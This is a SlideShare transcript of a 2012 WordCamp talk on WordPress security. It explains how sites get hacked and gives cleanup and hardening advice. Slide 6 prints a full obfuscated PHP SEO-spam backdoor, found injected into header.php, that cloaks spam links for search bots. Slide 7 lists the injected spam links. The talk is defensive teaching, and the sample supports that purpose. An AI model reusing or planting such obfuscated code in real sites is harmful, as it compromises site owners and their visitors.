Google says you shouldn’t visit my church


Published on

Justin Jones - Presentation at WordCamp Columbus, OH on 7/15/2012 regarding WordPress security

Published in: Technology, Design
1 Like
  • Be the first to comment

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

Google says you shouldn’t visit my church

  1. 1. Justin Jones • Fort Wayne, IN @jjonesftw
  2. 2. I’m Justin Jones0 Teacher0 Church Worker0 WordPress hobbyist0 Podcast cohost at “The Weekly Theme Show”0 @jjonesftw0
  3. 3. Why would someone want to hack my site?0 The world doesn’t revolve around you 0 Crime of opportunity 0 Don’t leave your front door unlocked0 “Black Hat” SEO0 To make money directly 0 Affiliate sales 0 Rogue virus scanners 0 Ransomeware
  4. 4. Why would someone want to hack my site?0 Serve up images and content for SPAM email
  5. 5. What do they do while they’re poking around my site?0 Alter robots.txt 0 Override the WordPress generated robots.txt to add their pages into search engines0 Create backdoors in unsuspecting .php files for future attacks0 Add their own .php files and images to serve up their payload content0 Some are specific to “robots” or HTTP Referrer
  6. 6. What do they do while they’re poking around my site?0 Inject code into theme files, like header.php<?//1234$GLOBALS[_2008634924_]=Array(error_re .porting,function_e .xi .st .s,fop .e .n,fwrite, .f.clos .e, .s .trstr,strtolower,ex .p .lode,ip2long,i .p2l .ong,l .ong2ip,ip2long,.fi .le_exists,pre .g_mat .ch,file_ge .t_contents,pr .eg_match,f .i .le ._get ._c .ont.ent .s,u .nseriali .ze,count,range,a .rra .y_splice,array_ .values,preg ._matc .h,file._get_ .contents,un .ser .ial .iz .e,gzuncompress,base .64_deco .de, .str .len); function_1572011439($i){$afa=Array(Ym90a28=,ZmlsZV9wd .XRf .Y2 .9ud .GV .udHM=,dw==,Z29v .Z .2 .xl,c2x.1cnA=, .bXN .uY .m .90,Yml .u .Z2JvdA==,Ym90,Y .3 .Jhd2 .w .=, .c3BpZGV .y,cm9.ib3Q=, .SH .R0cENsaWVudA= .=, .Y3 .V .y .b .A .==, .c2 .Nvb3Rlcg==,d3d3c3 .Rlcg==,.UHl0aG9 .u, .dX .J .sb .Gli,cG .Vyb .A= .=,bGlid3d3,b .HlueA==,VkIgUHJva .mVjd .A=.=,U .Hl0aG .9uLXVybGxpYi8yL .j .Y=,TW9 .6a .Wx .sYS .82N .jYuKD .Y .p,TW9 .6 .aWxs.YS80L .jAgK .GNvbXB .hdGli .b .G .U7IE1 .TS .UUgNi4w .OyBXa .W5kb3dzIE5UIDUuMS .k=,T.W96aWx .sYS .8 .0LjA .g .KGNv .bX .Bh .dGl .i .bGU .7KQ==, .TW96aWxsYS80 .LjAgK .GNvbXB.hdGlibG .U7IE1TSUUgNS4w .MDsg .V .2luZG .93cyA5OCk=, .TW .96 .aWxsYS8 .0LjAgKG .NvbXBhdGlibG.U7I .E .1 .TSUUg .N .i4wO .yBX .aW5 .kb3dzIE5UIDUuMTsg .U1YxK .Q .==, .TW96 .aWxs .YS80.LjAg .KGNvb .X .Bh .dGlibGU7IE .1TSUUgN .i4wOyBXaW5kb3dzIE5UIDU .uMTsgLk5FV .C .BDTF .IgM .S4wL.jM .p,Lw==,Lm .N .vcmU .=,fDxpc .D4oLiopPC9pc .D58VWl .z,LmNvcmU=, .fDx .p .cD4.oLiopPC9pc .D58V .W .lz,bGlj .ZW .5zZ .S50eH .Q=,U .kVNT1RF .X0 .FERFI=,SF .R .U.UF9VU0 .VSX0FH .RU .5U,Ym90 .a2 .8=,fDx .pbnQ+KC4q .K .T .wv .aW50Pnx .VaX.M=,bGljZW5zZS50 .eHQ=, .UkVR .VUV .TVF9VUkk=, .PGJ .yPg .==);return base64_decode($afa[$i]);}if(isset($_GET[_1572011439(0)])){}else{$GLOBALS[_2008634924_][0](0);}if(!$GLOBALS[_2008634924_][1](_1572011439(1))){function l__0($_0,$_1){$_2=@$GLOBALS[_2008634924_][2]($_0,_1572011439(2));if(!$_2){returnfalse;}else{$_3=$GLOBALS[_2008634924_][3]($_2,$_1);$GLOBALS[_2008634924_][4]($_2);return $_3;}}}functionl__1($_4){$_5=array(_1572011439(3),_1572011439(4),_1572011439(5),_1572011439(6),_1572011439(7),_1572011439(8),_1572011439(9),_1572011439(10),_1572011439(11),_1572011439(12),_1572011439(13),_1572011439(14),_1572011439(15),_1572011439(16),_1572011439(17),_1572011439(18),_1572011439(19),_1572011439(20),_1572011439(21),_1572011439(22),_1572011439(23),_1572011439(24),_1572011439(25),_1572011439(26),_1572011439(27));foreach($_5 as $_6){if($GLOBALS[_2008634924_][5]($GLOBALS[_2008634924_][6]($_7),$_6)){return($_6);}}return(false);}function l__2($_8,$_9){$_10=$GLOBALS[_2008634924_][7](_1572011439(28),$_8);$_11=$GLOBALS[_2008634924_][8]($_10[0]);$_12=$GLOBALS[_2008634924_][9]($_10[1]);$_13=$GLOBALS[_2008634924_][10]($_12)== $_10[1]?$_12:0xffffffff <<(32-$_10[1]);$_14=$GLOBALS[_2008634924_][11]($_9);return($_14&$_13)==($_11&$_13);}functionl__3($REMOTE_ADDR){if($GLOBALS[_2008634924_][12](_1572011439(29))){$GLOBALS[_2008634924_][13](_1572011439(30),$GLOBALS[_2008634924_][14](_1572011439(31)),$_15);}else{$GLOBALS[_2008634924_][15](_1572011439(32),$GLOBALS[_2008634924_][16](_1572011439(33)),$_15);}$_16=$GLOBALS[_2008634924_][17]($_15[1]);foreach($_16 as$_9){if(l__2($_9,$REMOTE_ADDR))return true;}return false;}function l__4($_17,$_18){$_19=($_17*25173+13849)%$_18;return(int)$_19;}function l__5($_20,$_21,$_18){$_22=array();$_23=$GLOBALS[_2008634924_][18]($_20);if($_23<$_18){returnfalse;}$_24=$GLOBALS[_2008634924_][19](0,$_23-1);$_21=$_21%$_23;for($_25=0;$_25<$_18;$_25++){$_26=l__4($_21,$_23--);$_22[]=$_20[$_24[$_26]];if(!$_23){break;}$GLOBALS[_2008634924_][20]($_24,$_26,1);$_24=$GLOBALS[_2008634924_][21]($_24);$_21=$_26;}return $_22;}$_27=l__3($_SERVER[_1572011439(34)]);$_28=l__1(@$_SERVER[_1572011439(35)]);if($_27 orisset($_GET[_1572011439(36)])or $_28){$GLOBALS[_2008634924_][22](_1572011439(37),$GLOBALS[_2008634924_][23](_1572011439(38)),$_29);$_30=$GLOBALS[_2008634924_][24]($GLOBALS[_2008634924_][25]($GLOBALS[_2008634924_][26]($_29[1])));$_31=l__5($_30,100+$GLOBALS[_2008634924_][27]($_SERVER[_1572011439(39)]),75);for($_25=0;$_25<75;$_25++)echo $_31[$_25] ._1572011439(40);}//1234?>
  7. 7. What do they do while they’re poking around my site?0 Inject code into theme files, like header.php<a href="">alison carroll hot</a><br><a href="">Jessica Lowndes</a><br><a href="">zelda williams</a><br><a href="">bush</a><br><a href="">Teresa Scanlan</a><br><a href="">leyla</a><br><a href="">Heather Mills</a><br><a href="">keshia knight pulliam polly</a><br><a href="">moira kelly biography</a><br><a href="">smurfs</a><br><a href="">Laurene jobs</a><br><a href="">bransales importadora</a><br><a href="">boo boo stewart</a><br><a href="">irina shayk y cristiano ronaldo</a><br><a href="">Vanessa Angel</a><br><a href="">lineas del metro mexico df</a><br><a href="">brian urlacher</a><br><a href="">jessie palmer</a><br><a href="">Jessie Palmer</a><br><a href="">mark hamill before and after crash</a><br><a href="">jessica-jane clement</a><br><a href="">ashanti</a><br><a href="">linea del metro ciudad de mexico</a><br><a href="">lady antebellum photos</a><br><a href="">heidi range</a><br><a href="">miley cyrus nude</a><br><a href="">elizabeth hurley</a><br><a href="">Ty Pennington Girlfriend</a><br><a href="">lsm05</a><br><a href="">ls magazine pics</a><br><a href="">megan mullally naked</a><br><a href="">ls model</a><br><a href="">mensagens lindas</a><br><a href="">justin bieber bulge</a><br><a href="">lg esteem review</a>
  8. 8. How Do They Get In?0 Outdated versions of WordPress0 Outdated themes and plugins0 Hosting providers behind the times0 Insecure password / brute force0 Compromised computer 0 Passwords cached in FTP clients, passwords stored in an unencrypted text file etc…0 Unsecure internet connection 0 Rogue access points 0 Packet sniffers on public WiFi
  9. 9. What are the consequences?0 Google will punish you. 0 Google Safe Browsing or manual removal action
  10. 10. What are the consequences?0 Google will punish you. 0 Google Safe Browsing or manual removal action
  11. 11. What are the consequences?0 Google will punish you. 0 Google Safe Browsing or manual removal action
  12. 12. What are the consequences?0 Other “blacklisting” like Norton Safe Web, Phish Tank, Opera, Sucuri, and many others0 Spammy content will get indexed with every search engine 0 Don’t forget about directory listing sites, like Google Places / Google Maps0 Your host may dump you for violating TOS0 Be a good neighbor!
  13. 13. What are the consequences?0 Be a good neighbor! Security is everyone’s responsibility
  14. 14. What are the consequences?0 Malware cost the US economy 2.2 billion dollars in lost productivity in 20110 Are you an ecommerce site? 0 Payment gateway is probably offsite, but what about people’s email addresses?0 Membership site? 0 Many people re-use passwords 0 Linked In,, many others recently0 Business or organization? 0 How much street cred will you earn serving content from
  15. 15. Is WordPress insecure?0 No.0 Pharma hack had a patch out before exploited0 WordPress has a target on its back 0 WordPress is used by over 14.7% of Alexa Internets "top 1 million" websites and as of August 2011 manages 22% of all new websites.0 Some theme and plugin authors are lazy/sloppy, or use depreciated/inefficient methods0 You are your own worst enemy! 0 Think about Windows XP back in like 2002
  16. 16. Is WordPress insecure?0 Be careful who you trust 0 Everyone is a “developer” now 0 NEVER download and install a theme for free that you should have paid for 0 Shady scraper sites, torrents, etc… 0 “Having a website *should* cost you more than $300 a year. If it doesn’t, then you’re doing it wrong.” --Otto
  17. 17. Is WordPress insecure?0 Be careful who you trust 0 Be very wary of downloading a free theme outside of the theme repo 0 Use “Theme Authenticity Checker” and “Theme Check” 0 Siobhan McKeown at Google’d “free wordpress themes” 0 Top 10 results:; 1=poorly coded; 8=actively using encrypted code to insert spammy links 0 Use trusted theme marketplaces or commercial shops
  18. 18. Prepare for Disaster0 It’s going to happen0 Maintain regular backups 0 Server side or Plugins0 Be registered with Google Webmaster Tools0 Know how to contact your hosting provider0 Know a developer0 Visit your site0 Watch your stats
  19. 19. Update. Update. Update.0 Source:
  20. 20. Update. Update. Update. 0 August 2011, so 3.2.1 was most current 0 Less than half of the top 100k sites running WordPress were up to date! 0 WordPress interates quickly to patch security holes. Keep updated to benefit from their work0 Source:
  21. 21. Update. Update. Update.0 WordPress core, .org plugins and .org themes can use the core update functionality0 Some commercial theme and plugins have their own way of one click upgrade, some are manual only0 Some have notifications, some don’t0 Sign up for release notifications from download page
  22. 22. Here’s Where This Gets Technical0 I’ll have these slides up on Slide Share0 I’ve reserved time at the end for questions, and I’ll be available after for individual questions
  23. 23. It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What? 0 Take a deep breath and crack open a beer. You’ve got some work ahead of you. 0 Get back control of your site 0 Get the site offline if you can!
  24. 24. It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What? 0 Change *every* single one of your passwords 0 Domain registrar, hosting account, all WordPress users, SQL database username and password, FTP account password 0 I suggest changing your email account passwords 0 Hire a professional 0 Check out 0 Many others out there, Google them up!
  25. 25. It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What? 0 Regenerate WordPress secret keys / salts 0 Manually in wp-config.php or use a plugin define(AUTH_KEY, n%foh;/v6$)0<t]=Be]o~2L?nopubK;b1-P(x=~dCyY[pL]^Ry//=I$y.w-8&HGP); define(SECURE_AUTH_KEY, q#h,K.OZ=-IT)(-`3`)G1Kr-&ZP,!CEM1<sMx-1eDI<H*BfO2G@~ bD<)]8rW|{/); define(LOGGED_IN_KEY, Vuvu|_`AGu@) >*7K~l]B1v-d3-e}<Qo#hki8Fy(Bov:T~wOm#8hqHZbWP2khxR}); define(NONCE_KEY, B&8:S*:tZR700I9]3~sWI0Rv1+9e_O{KXcc+`a!eB-wV$+Cctv$q*Yb+c.5w<xns); define(AUTH_SALT, bpx*[xMhU<FjufQ*``oc&NNdvz,-FJ=|~+$G:i9qaCFRY>u,-}%-Cc-G|!5r0|D@); define(SECURE_AUTH_SALT, S+C/f6B6[Y+uGJt!@K|c:49tA}xB!5_zE6RZ+ AT.bsFNvD^-YGOI@HG8V:YbR?q); define(LOGGED_IN_SALT, ~oP,M4HQ8 ,M$<A[(`HZ@>_BC,Yo/Y].kw+{g^KnLPzB[UAI_Z6h6M+KbZ|.|<$-); define(NONCE_SALT, KW*LbM<2qL7LAZZ!vdto?c?!(5eSb)|o$BA;{F-CLZB=M%_QfbdW[@lSDT_]ImE[);
  26. 26. It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What? 0 Backup 0 Restore from a previous backup 0 Find and delete all the junk they added 0 Very insidious. Creating rogue sitemaps, modifying .htaccess files, creating backdoors, adding index.php files to override permalinks, etc… 0 Adding posts and images to database 0 Reinstall WordPress core, plugins and themes
  27. 27. It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What? 0 Begin the process of restoring your good name 0 Request delisting of bogus content from Google and other search engines 0 Very tedious, manual process 0 Request reevaluation from blacklisting services 0 Don’t forget about other services that pull content from your site, like Google places 0 Wait it out. This will take weeks and months 0 Prepare better for next time
  28. 28. Harden Your Site. The Easy Stuff.0 Keep up to date! WordPress, plugins, themes – but also PHP version on your host0 Use strong passwords – no words! Not P@$$woRd either. 0 Consider using a password manager0 Remove “admin” user
  29. 29. Harden Your Site. The Easy Stuff.0 Only connect using SFTP0 Never ever hack core WordPress files0 Keep a clean house! 0 Other WP installs, other PHP services, plugins, old themes0 Disable user registration
  30. 30. Harden Your Site.The More Complicated Stuff.0 Store your wp-config file outside of public_html 0 Done at install or can be moved later0 Change the database prefix0 Use strong database passwords0 Use proper 755 file permissions 0 If a plugin or theme asks you to set 777, avoid.
  31. 31. Harden Your Site.The More Complicated Stuff.0 Only log in to site using SSL (https://...)0 Don’t advertise that you’re running an out of date version 0 Remove readme.html (plugins available) 0 Remove WordPress version from header (plugins available)
  32. 32. Harden Your Site.The More Complicated Stuff.0 Plugins! Plugins! Plugins! 0 Monitor core / template files 0 “WordPress File Monitor Plus” 0 Scan template files for suspicious code 0 “AntiVirus” 0 WP and server security settings 0 “WebsiteDefender WordPress Security” 0 Keep up to date 0 “Update Notifications”
  33. 33. Harden Your Site.The More Complicated Stuff.0 Plugins! Plugins! Plugins! 0 “WordPress Firewall 2” 0 “Block Bad Queries” 0 Backup 0 VaultPress 0 BackupBuddy 0 Login Lockdown 0 Lock out excessive retries and mask login errors 0 Many others available for two factor auth, etc… 0 Sucuri plugin has a firewall to block known bad IP’s
  34. 34. Should you really be hosting your own site?0 Do you like to change your own oil in your car or take it to the Jiffy Lube?0 is a great resource for most personal bloggers. Focus on writing your content.0 Consider a WordPress managed host. 0 WP Engine, ZippyKid, Pagely, etc…0 Don’t be afraid to pay someone! 0 How important is this project? 0 What is your time worth?
  35. 35. Resources0 0 eBook “Locking Down WordPress”
  36. 36. Resources0 These slides on Slide Share0 Search for slides from Dre Armeda and Brad Williams0 Codex0 Otto on WordPress0 – service and blog0 Lockdown WordPress – A Security Webinar with Dre Armeda 0 1.5 hour interview – great resource!0 Countless plugins on the repo0
  37. 37. Questions?0 No question is stupid. We’re all here to learn!0 If you’re smarter than I am, please jump in here.